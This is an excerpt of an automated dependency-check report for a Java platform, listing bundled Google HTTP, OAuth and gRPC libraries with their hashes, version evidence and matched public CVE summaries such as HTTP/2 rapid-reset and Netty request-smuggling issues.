Evidence Type Source Name Value Confidence Vendor file name google-http-client High Vendor jar package name api Highest Vendor jar package name client Highest Vendor jar package name google Highest Vendor jar package name http Highest Vendor Manifest automatic-module-name com.google.api.client Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor Manifest bundle-docurl http://www.google.com/ Low Vendor Manifest bundle-symbolicname com.google.http-client.google-http-client Medium Vendor Manifest Implementation-Vendor Google High Vendor Manifest Implementation-Vendor-Id com.google.http-client Medium Vendor Manifest originally-created-by Apache Maven Bundle Plugin Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid google-http-client Highest Vendor pom artifactid google-http-client Low Vendor pom groupid com.google.http-client Highest Vendor pom name Google HTTP Client Library for Java High Vendor pom parent-artifactid google-http-client-parent Low Product file name google-http-client High Product jar package name api Highest Product jar package name client Highest Product jar package name google Highest Product jar package name http Highest Product Manifest automatic-module-name com.google.api.client Medium Product Manifest build-jdk-spec 1.8 Low Product Manifest bundle-docurl http://www.google.com/ Low Product Manifest Bundle-Name Google HTTP Client Library for Java Medium Product Manifest bundle-symbolicname com.google.http-client.google-http-client Medium Product Manifest Implementation-Title Google HTTP Client Library for Java High Product Manifest originally-created-by Apache Maven Bundle Plugin Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid google-http-client Highest Product pom groupid com.google.http-client Highest Product pom name Google HTTP Client Library for Java High Product pom parent-artifactid google-http-client-parent Medium Version file version 1.32.0 High Version Manifest Bundle-Version 1.32.0 High Version Manifest Implementation-Version 1.32.0 High Version pom version 1.32.0 Highest
google-http-client-appengine-1.31.0.jarFile Path: /var/simplicite/.m2/repository/com/google/http-client/google-http-client-appengine/1.31.0/google-http-client-appengine-1.31.0.jarMD5: e98ce3f240ef969a94c0b46bd7398cebSHA1: 8e9f1aa1e843727351b14ffce2bda4416363b67aSHA256: c3a96061666b43615919cfb4314c512b067c087efef1de4069d856ff43dc15cfReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-http-client-appengine High Vendor jar package name client Highest Vendor jar package name extensions Highest Vendor jar package name google Highest Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-http-client-appengine Highest Vendor pom artifactid google-http-client-appengine Low Vendor pom groupid com.google.http-client Highest Vendor pom name Google App Engine extensions to the Google HTTP Client Library for Java. High Vendor pom parent-artifactid google-http-client-parent Low Product file name google-http-client-appengine High Product jar package name client Highest Product jar package name extensions Highest Product jar package name google Highest Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-http-client-appengine Highest Product pom groupid com.google.http-client Highest Product pom name Google App Engine extensions to the Google HTTP Client Library for Java. High Product pom parent-artifactid google-http-client-parent Medium Version file version 1.31.0 High Version pom version 1.31.0 Highest
google-http-client-gson-1.32.0.jarFile Path: /var/simplicite/.m2/repository/com/google/http-client/google-http-client-gson/1.32.0/google-http-client-gson-1.32.0.jarMD5: 836f19bb2f7b603363fca036e77694abSHA1: 64c62622f4071f2116e8f3e8c79e1902c6eb732fSHA256: da0c814b3bebc0500b3603c81c54630d295694b3db3738be9747dd7230cad37aReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-http-client-gson High Vendor jar package name api Highest Vendor jar package name client Highest Vendor jar package name google Highest Vendor jar package name json Highest Vendor Manifest automatic-module-name com.google.api.client.json.gson Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-http-client-gson Highest Vendor pom artifactid google-http-client-gson Low Vendor pom groupid com.google.http-client Highest Vendor pom name GSON extensions to the Google HTTP Client Library for Java. High Vendor pom parent-artifactid google-http-client-parent Low Product file name google-http-client-gson High Product jar package name api Highest Product jar package name client Highest Product jar package name google Highest Product jar package name json Highest Product Manifest automatic-module-name com.google.api.client.json.gson Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-http-client-gson Highest Product pom groupid com.google.http-client Highest Product pom name GSON extensions to the Google HTTP Client Library for Java. High Product pom parent-artifactid google-http-client-parent Medium Version file version 1.32.0 High Version pom version 1.32.0 Highest
google-http-client-jackson-1.29.2.jarLicense:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/http-client/google-http-client-jackson/1.29.2/google-http-client-jackson-1.29.2.jar
MD5: 72ad680f4cd70758086ec12492544fcd
SHA1: 98ba3a73bbfcabbaa1105fc013305d319f6ebf32
SHA256: 54478a70cc90eb7fd7e6ab89a447a41fb1f4f98201bf4d5418d4647751538552
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-http-client-jackson High Vendor jar package name api Highest Vendor jar package name client Highest Vendor jar package name google Highest Vendor jar package name json Highest Vendor Manifest automatic-module-name com.google.api.client.json.jackson Medium Vendor Manifest bundle-docurl http://www.google.com/ Low Vendor Manifest bundle-symbolicname com.google.http-client.google-http-client-jackson Medium Vendor Manifest originally-created-by Apache Maven Bundle Plugin Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid google-http-client-jackson Highest Vendor pom artifactid google-http-client-jackson Low Vendor pom groupid com.google.http-client Highest Vendor pom name Jackson extensions to the Google HTTP Client Library for Java. High Vendor pom parent-artifactid google-http-client-parent Low Product file name google-http-client-jackson High Product jar package name api Highest Product jar package name client Highest Product jar package name google Highest Product jar package name json Highest Product Manifest automatic-module-name com.google.api.client.json.jackson Medium Product Manifest bundle-docurl http://www.google.com/ Low Product Manifest Bundle-Name Jackson extensions to the Google HTTP Client Library for Java. Medium Product Manifest bundle-symbolicname com.google.http-client.google-http-client-jackson Medium Product Manifest originally-created-by Apache Maven Bundle Plugin Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid google-http-client-jackson Highest Product pom groupid com.google.http-client Highest Product pom name Jackson extensions to the Google HTTP Client Library for Java. High Product pom parent-artifactid google-http-client-parent Medium Version file version 1.29.2 High Version Manifest Bundle-Version 1.29.2 High Version pom version 1.29.2 Highest
CVE-2020-13956 suppress
Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution. NVD-CWE-noinfo
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N References:
Vulnerable Software & Versions: (show all )
google-http-client-jackson2-1.32.0.jarFile Path: /var/simplicite/.m2/repository/com/google/http-client/google-http-client-jackson2/1.32.0/google-http-client-jackson2-1.32.0.jarMD5: b21303bba460a5525bd0f7219d1e6339SHA1: fa975dca9d9896896b3e9d51961833f72965c55eSHA256: 4cc7c7b0cf0cf03cb7264763efbacee8af4621eb09a51a078331f3f717c09694Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-http-client-jackson2 High Vendor jar package name api Highest Vendor jar package name client Highest Vendor jar package name google Highest Vendor jar package name json Highest Vendor Manifest automatic-module-name com.google.api.client.json.jackson2 Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-http-client-jackson2 Highest Vendor pom artifactid google-http-client-jackson2 Low Vendor pom groupid com.google.http-client Highest Vendor pom name Jackson 2 extensions to the Google HTTP Client Library for Java. High Vendor pom parent-artifactid google-http-client-parent Low Product file name google-http-client-jackson2 High Product jar package name api Highest Product jar package name client Highest Product jar package name google Highest Product jar package name json Highest Product Manifest automatic-module-name com.google.api.client.json.jackson2 Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-http-client-jackson2 Highest Product pom groupid com.google.http-client Highest Product pom name Jackson 2 extensions to the Google HTTP Client Library for Java. High Product pom parent-artifactid google-http-client-parent Medium Version file version 1.32.0 High Version pom version 1.32.0 Highest
CVE-2022-45688 suppress
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-5072 suppress
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
google-oauth-client-1.30.2.jarDescription:
Google OAuth Client Library for Java. Functionality that works on all supported Java platforms,
including Java 7 (or higher) desktop (SE) and web (EE), Android, and Google App Engine.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/oauth-client/google-oauth-client/1.30.2/google-oauth-client-1.30.2.jar
MD5: bbf90ca5aeac05210461cb292e9b7027
SHA1: bc33df03b169de18386256adf23af6bc5f41cb28
SHA256: f97bd2674949d0ce59e198129edf46dbd7c5509f382a1f41ff25040046ff5178
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-oauth-client High Vendor jar package name api Highest Vendor jar package name auth Highest Vendor jar package name client Highest Vendor jar package name google Highest Vendor Manifest automatic-module-name com.google.api.client.auth Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor Manifest bundle-docurl https://www.google.com/ Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.7 Low Vendor Manifest bundle-symbolicname com.google.oauth-client Medium Vendor Manifest Implementation-Vendor Google High Vendor Manifest Implementation-Vendor-Id com.google.oauth-client Medium Vendor Manifest originally-created-by Apache Maven Bundle Plugin Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid google-oauth-client Highest Vendor pom artifactid google-oauth-client Low Vendor pom groupid com.google.oauth-client Highest Vendor pom name Google OAuth Client Library for Java High Vendor pom parent-artifactid google-oauth-client-parent Low Product file name google-oauth-client High Product jar package name api Highest Product jar package name auth Highest Product jar package name client Highest Product jar package name google Highest Product Manifest automatic-module-name com.google.api.client.auth Medium Product Manifest build-jdk-spec 1.8 Low Product Manifest bundle-docurl https://www.google.com/ Low Product Manifest Bundle-Name Google OAuth Client Library for Java Medium Product Manifest bundle-requiredexecutionenvironment JavaSE-1.7 Low Product Manifest bundle-symbolicname com.google.oauth-client Medium Product Manifest Implementation-Title Google OAuth Client Library for Java High Product Manifest originally-created-by Apache Maven Bundle Plugin Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid google-oauth-client Highest Product pom groupid com.google.oauth-client Highest Product pom name Google OAuth Client Library for Java High Product pom parent-artifactid google-oauth-client-parent Medium Version file version 1.30.2 High Version Manifest Bundle-Version 1.30.2 High Version Manifest Implementation-Version 1.30.2 High Version pom version 1.30.2 Highest
CVE-2020-7692 suppress
PKCE support is not implemented in accordance with the RFC for OAuth 2.0 for Native Apps. Without the use of PKCE, the authorization code returned by an authorization server is not enough to guarantee that the client that issued the initial authorization request is the one that will be authorized. An attacker is able to obtain the authorization code using a malicious app on the client-side and use it to gain authorization to the protected resource. This affects the package com.google.oauth-client:google-oauth-client before 1.31.0. CWE-863 Incorrect Authorization
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N References:
Vulnerable Software & Versions:
CVE-2021-22573 suppress
The vulnerability is that IDToken verifier does not verify if token is properly signed. Signature verification makes sure that the token's payload comes from valid provider, not from someone else. An attacker can provide a compromised token with custom payload. The token will pass the validation on the client side. We recommend upgrading to version 1.33.3 or above CWE-347 Improper Verification of Cryptographic Signature
CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:P/A:N CVSSv3:
Base Score: HIGH (7.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N References:
Vulnerable Software & Versions:
googlecloud-2.2.0.jarDescription:
jclouds components common to Google Cloud products License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/jclouds/common/googlecloud/2.2.0/googlecloud-2.2.0.jar
MD5: 20b180abf74f86ace4464018768d57a5
SHA1: d07a6d75dfe2d36036b42255403f907a901985c7
SHA256: 80692d8e51eb19e85f5507124ed1b32012f2bd20b855083ea773dcf8c023f610
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name googlecloud High Vendor jar package name googlecloud Highest Vendor jar package name jclouds Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname googlecloud Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid googlecloud Highest Vendor pom artifactid googlecloud Low Vendor pom groupid org.apache.jclouds.common Highest Vendor pom name jclouds Google Cloud Core High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name googlecloud High Product jar package name googlecloud Highest Product jar package name jclouds Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds Google Cloud Core Medium Product Manifest bundle-symbolicname googlecloud Medium Product Manifest Implementation-Title jclouds Google Cloud Core High Product Manifest specification-title jclouds jclouds Google Cloud Core Medium Product pom artifactid googlecloud Highest Product pom groupid org.apache.jclouds.common Highest Product pom name jclouds Google Cloud Core High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
grib-4.5.5.jarDescription:
Decoder for the GRIB format.
File Path: /var/simplicite/.m2/repository/edu/ucar/grib/4.5.5/grib-4.5.5.jarMD5: 0cb80276d8ea89cacc1d5632dbf39fe9SHA1: cfe552910e9a8d57ce71134796abb281a74ead16SHA256: 1e0492135f421f554c4651a95225f27f2a3230e993329f69348110f8521c32d9Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name grib High Vendor jar package name collection Highest Vendor jar package name grib Highest Vendor jar package name thredds Highest Vendor jar package name ucar Highest Vendor Manifest built-on 20150306.1537 Low Vendor Manifest Implementation-Vendor UCAR/Unidata High Vendor Manifest Implementation-Vendor-Id edu.ucar Medium Vendor pom artifactid grib Highest Vendor pom artifactid grib Low Vendor pom developer email caron@unidata.ucar.edu Low Vendor pom developer id caron Medium Vendor pom developer name John Caron Medium Vendor pom developer name Robb Kambic Medium Vendor pom developer org UCAR/UNIDATA Medium Vendor pom developer org URL http://www.unidata.ucar.edu/ Medium Vendor pom groupid edu.ucar Highest Vendor pom name GRIB IOSP and Feature Collection High Vendor pom parent-artifactid thredds-parent Low Vendor pom url http://www.unidata.ucar.edu/software/netcdf-java/ Highest Product file name grib High Product jar package name collection Highest Product jar package name grib Highest Product jar package name thredds Highest Product jar package name ucar Highest Product Manifest built-on 20150306.1537 Low Product Manifest Implementation-Title GRIB IOSP and Feature Collection High Product pom artifactid grib Highest Product pom developer email caron@unidata.ucar.edu Low Product pom developer id caron Low Product pom developer name John Caron Low Product pom developer name Robb Kambic Low Product pom developer org UCAR/UNIDATA Low Product pom developer org URL http://www.unidata.ucar.edu/ Low Product pom groupid edu.ucar Highest Product pom name GRIB IOSP and Feature Collection High Product pom parent-artifactid thredds-parent Medium Product pom url http://www.unidata.ucar.edu/software/netcdf-java/ Medium Version file version 4.5.5 High Version Manifest Implementation-Version 4.5.5 High Version pom version 4.5.5 Highest
grpc-context-1.22.1.jarDescription:
gRPC: Context License:
Apache 2.0: https://opensource.org/licenses/Apache-2.0 File Path: /var/simplicite/.m2/repository/io/grpc/grpc-context/1.22.1/grpc-context-1.22.1.jar
MD5: c114b573888704a725b5a86c04f817da
SHA1: 1a074f9cf6f367b99c25e70dc68589f142f82d11
SHA256: 780a3937705b3c92e07292c97d065b2676fcbe031eae250f1622b026485f294e
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name grpc-context High Vendor jar package name context Highest Vendor jar package name grpc Highest Vendor jar package name io Highest Vendor Manifest source-compatibility 1.7 Low Vendor Manifest target-compatibility 1.7 Low Vendor pom artifactid grpc-context Highest Vendor pom artifactid grpc-context Low Vendor pom developer email grpc-io@googlegroups.com Low Vendor pom developer id grpc.io Medium Vendor pom developer name gRPC Contributors Medium Vendor pom developer org gRPC Authors Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid io.grpc Highest Vendor pom name io.grpc:grpc-context High Vendor pom url grpc/grpc-java Highest Product file name grpc-context High Product jar package name context Highest Product jar package name grpc Highest Product jar package name io Highest Product Manifest Implementation-Title grpc-context High Product Manifest source-compatibility 1.7 Low Product Manifest target-compatibility 1.7 Low Product pom artifactid grpc-context Highest Product pom developer email grpc-io@googlegroups.com Low Product pom developer id grpc.io Low Product pom developer name gRPC Contributors Low Product pom developer org gRPC Authors Low Product pom developer org URL https://www.google.com Low Product pom groupid io.grpc Highest Product pom name io.grpc:grpc-context High Product pom url grpc/grpc-java High Version file version 1.22.1 High Version Manifest Implementation-Version 1.22.1 High Version pom version 1.22.1 Highest
CVE-2023-33953 suppress
gRPC contains a vulnerability that allows hpack table accounting errors could lead to unwanted disconnects between clients and servers in exceptional cases/ Three vectors were found that allow the following DOS attacks:
- Unbounded memory buffering in the HPACK parser
- Unbounded CPU consumption in the HPACK parser
The unbounded CPU consumption is down to a copy that occurred per-input-block in the parser, and because that could be unbounded due to the memory copy bug we end up with an O(n^2) parsing loop, with n selected by the client.
The unbounded memory buffering bugs:
- The header size limit check was behind the string reading code, so we needed to first buffer up to a 4 gigabyte string before rejecting it as longer than 8 or 16kb.
- HPACK varints have an encoding quirk whereby an infinite number of 0’s can be added at the start of an integer. gRPC’s hpack parser needed to read all of them before concluding a parse.
- gRPC’s metadata overflow check was performed per frame, so that the following sequence of frames could cause infinite buffering: HEADERS: containing a: 1 CONTINUATION: containing a: 2 CONTINUATION: containing a: 3 etc… CWE-834 Excessive Iteration, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-44487 suppress
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-32732 suppress
gRPC contains a vulnerability whereby a client can cause a termination of connection between a HTTP2 proxy and a gRPC server: a base64 encoding error for `-bin` suffixed headers will result in a disconnection by the gRPC server, but is typically allowed by HTTP2 proxies. We recommend upgrading beyond the commit in https://github.com/grpc/grpc/pull/32309 https://www.google.com/url
NVD-CWE-Other
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L References:
Vulnerable Software & Versions:
grpc-core-1.23.0.jarDescription:
gRPC: Core License:
Apache 2.0: https://opensource.org/licenses/Apache-2.0 File Path: /var/simplicite/.m2/repository/io/grpc/grpc-core/1.23.0/grpc-core-1.23.0.jar
MD5: d70312da590558ac0518886976de6b84
SHA1: 82d0c88d65acf92fb3d66a0ee800b5da85258c39
SHA256: ccb52503d051fca980ac7853fb9d8aaf3f00a6fadf16fffd574296b26b3d440b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name grpc-core High Vendor jar package name grpc Highest Vendor jar package name io Highest Vendor Manifest source-compatibility 1.7 Low Vendor Manifest target-compatibility 1.7 Low Vendor pom artifactid grpc-core Highest Vendor pom artifactid grpc-core Low Vendor pom developer email grpc-io@googlegroups.com Low Vendor pom developer id grpc.io Medium Vendor pom developer name gRPC Contributors Medium Vendor pom developer org gRPC Authors Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid io.grpc Highest Vendor pom name io.grpc:grpc-core High Vendor pom url grpc/grpc-java Highest Product file name grpc-core High Product jar package name grpc Highest Product jar package name io Highest Product Manifest Implementation-Title grpc-core High Product Manifest source-compatibility 1.7 Low Product Manifest target-compatibility 1.7 Low Product pom artifactid grpc-core Highest Product pom developer email grpc-io@googlegroups.com Low Product pom developer id grpc.io Low Product pom developer name gRPC Contributors Low Product pom developer org gRPC Authors Low Product pom developer org URL https://www.google.com Low Product pom groupid io.grpc Highest Product pom name io.grpc:grpc-core High Product pom url grpc/grpc-java High Version file version 1.23.0 High Version Manifest Implementation-Version 1.23.0 High Version pom version 1.23.0 Highest
Related Dependencies grpc-alts-1.23.0.jarFile Path: /var/simplicite/.m2/repository/io/grpc/grpc-alts/1.23.0/grpc-alts-1.23.0.jar MD5: 03e3621942d9bf763bf8b7ae9e92b591 SHA1: bfa3dc430f7877abf11ea0da9d596dcd75eec61d SHA256: b9d46115212d0b6183134e39cac3aa428598b031dd15b1779e253896690b681f pkg:maven/io.grpc/grpc-alts@1.23.0 grpc-api-1.23.0.jarFile Path: /var/simplicite/.m2/repository/io/grpc/grpc-api/1.23.0/grpc-api-1.23.0.jar MD5: da37c14bf614d706aaa9f00590cfa91b SHA1: 903f250bc1d01299480e526a25cd974088699a48 SHA256: ff4486cdd89b6e4568af13f71e0480bad6a06391a3d636996ce1d4a353516373 pkg:maven/io.grpc/grpc-api@1.23.0 grpc-auth-1.23.0.jarFile Path: /var/simplicite/.m2/repository/io/grpc/grpc-auth/1.23.0/grpc-auth-1.23.0.jar MD5: 4358dc8d1132cb9d48ea2197659044b9 SHA1: 19d71f19653d2cc786498819557431312d0dbf2d SHA256: c827efaefb17bf274eea654de4f0fe6cb3eef53548635e8fad2e8a1bf8a18b44 pkg:maven/io.grpc/grpc-auth@1.23.0 grpc-grpclb-1.23.0.jarFile Path: /var/simplicite/.m2/repository/io/grpc/grpc-grpclb/1.23.0/grpc-grpclb-1.23.0.jar MD5: cb4ccf8972f972d1d209f741d4afb402 SHA1: 99e6dad4cb8f00ad17e01c25ff5a14a933c1b9ba SHA256: c4e88b277c4822203f50f7fe1c56c40d8377d1b268de726471e0ee113f8b769f pkg:maven/io.grpc/grpc-grpclb@1.23.0 grpc-netty-shaded-1.23.0.jarFile Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar MD5: 456f3a4c7c60aec30886dcc4a03eb206 SHA1: 29c6b73d13098a7e0876cce325b3cd6204ed3297 SHA256: 42e3fa013d0e2a98bc55e8ec4f9c473442b4d527760e3fb565a44626fcf1c3a4 pkg:maven/io.grpc/grpc-netty-shaded@1.23.0 grpc-stub-1.23.0.jarFile Path: /var/simplicite/.m2/repository/io/grpc/grpc-stub/1.23.0/grpc-stub-1.23.0.jar MD5: c3aacd8363bbfac5318d1c5f2ccd53ce SHA1: 2e9e6890a7e8402a9b715ce1fad0d1827e733e49 SHA256: 2c4120cf61461de4da76e85edd81e1437696bb2689fb78acce1f76930321d7fe pkg:maven/io.grpc/grpc-stub@1.23.0 CVE-2023-33953 suppress
gRPC contains a vulnerability that allows hpack table accounting errors could lead to unwanted disconnects between clients and servers in exceptional cases/ Three vectors were found that allow the following DOS attacks:
- Unbounded memory buffering in the HPACK parser
- Unbounded CPU consumption in the HPACK parser
The unbounded CPU consumption is down to a copy that occurred per-input-block in the parser, and because that could be unbounded due to the memory copy bug we end up with an O(n^2) parsing loop, with n selected by the client.
The unbounded memory buffering bugs:
- The header size limit check was behind the string reading code, so we needed to first buffer up to a 4 gigabyte string before rejecting it as longer than 8 or 16kb.
- HPACK varints have an encoding quirk whereby an infinite number of 0’s can be added at the start of an integer. gRPC’s hpack parser needed to read all of them before concluding a parse.
- gRPC’s metadata overflow check was performed per frame, so that the following sequence of frames could cause infinite buffering: HEADERS: containing a: 1 CONTINUATION: containing a: 2 CONTINUATION: containing a: 3 etc… CWE-834 Excessive Iteration, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-44487 suppress
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-4785 suppress
Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-32732 suppress
gRPC contains a vulnerability whereby a client can cause a termination of connection between a HTTP2 proxy and a gRPC server: a base64 encoding error for `-bin` suffixed headers will result in a disconnection by the gRPC server, but is typically allowed by HTTP2 proxies. We recommend upgrading beyond the commit in https://github.com/grpc/grpc/pull/32309 https://www.google.com/url
NVD-CWE-Other
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L References:
Vulnerable Software & Versions:
grpc-google-cloud-pubsub-v1-1.73.0.jarDescription:
GRPC library for grpc-google-cloud-pubsub-v1 File Path: /var/simplicite/.m2/repository/com/google/api/grpc/grpc-google-cloud-pubsub-v1/1.73.0/grpc-google-cloud-pubsub-v1-1.73.0.jarMD5: 9b3a2decec756af86003548f774a2c67SHA1: 0c4d29736d21922b05641d402a8afff91fb49eb6SHA256: 07c9e4928c355de591941cd65ab8f714123de76c64ecda3c21d89a5e921932c9Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name grpc-google-cloud-pubsub-v1 High Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name pubsub Highest Vendor jar package name pubsub Low Vendor jar package name v1 Highest Vendor jar package name v1 Low Vendor pom artifactid grpc-google-cloud-pubsub-v1 Highest Vendor pom artifactid grpc-google-cloud-pubsub-v1 Low Vendor pom groupid com.google.api.grpc Highest Vendor pom name grpc-google-cloud-pubsub-v1 High Vendor pom parent-artifactid google-api-grpc Low Product file name grpc-google-cloud-pubsub-v1 High Product jar package name google Highest Product jar package name pubsub Highest Product jar package name pubsub Low Product jar package name v1 Highest Product jar package name v1 Low Product pom artifactid grpc-google-cloud-pubsub-v1 Highest Product pom groupid com.google.api.grpc Highest Product pom name grpc-google-cloud-pubsub-v1 High Product pom parent-artifactid google-api-grpc Medium Version file version 1.73.0 High Version pom parent-version 1.73.0 Low Version pom version 1.73.0 Highest
grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-codec-http2:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-codec-http2/pom.xmlMD5: 4d185495e97a28fdc3ec0433e273f4c4SHA1: a29512948602165fb6e0ebbfd2a55c23d1ad164cSHA256: 40f6d923fc56b303e286f67214d00a9501d853922344917be4c0b2a6919100b0Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid netty-codec-http2 Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Codec/HTTP2 High Vendor pom parent-artifactid netty-parent Low Product pom artifactid netty-codec-http2 Highest Product pom groupid io.netty Highest Product pom name Netty/Codec/HTTP2 High Product pom parent-artifactid netty-parent Medium Version pom version 4.1.38.Final Highest
CVE-2019-20444 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold." CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N References:
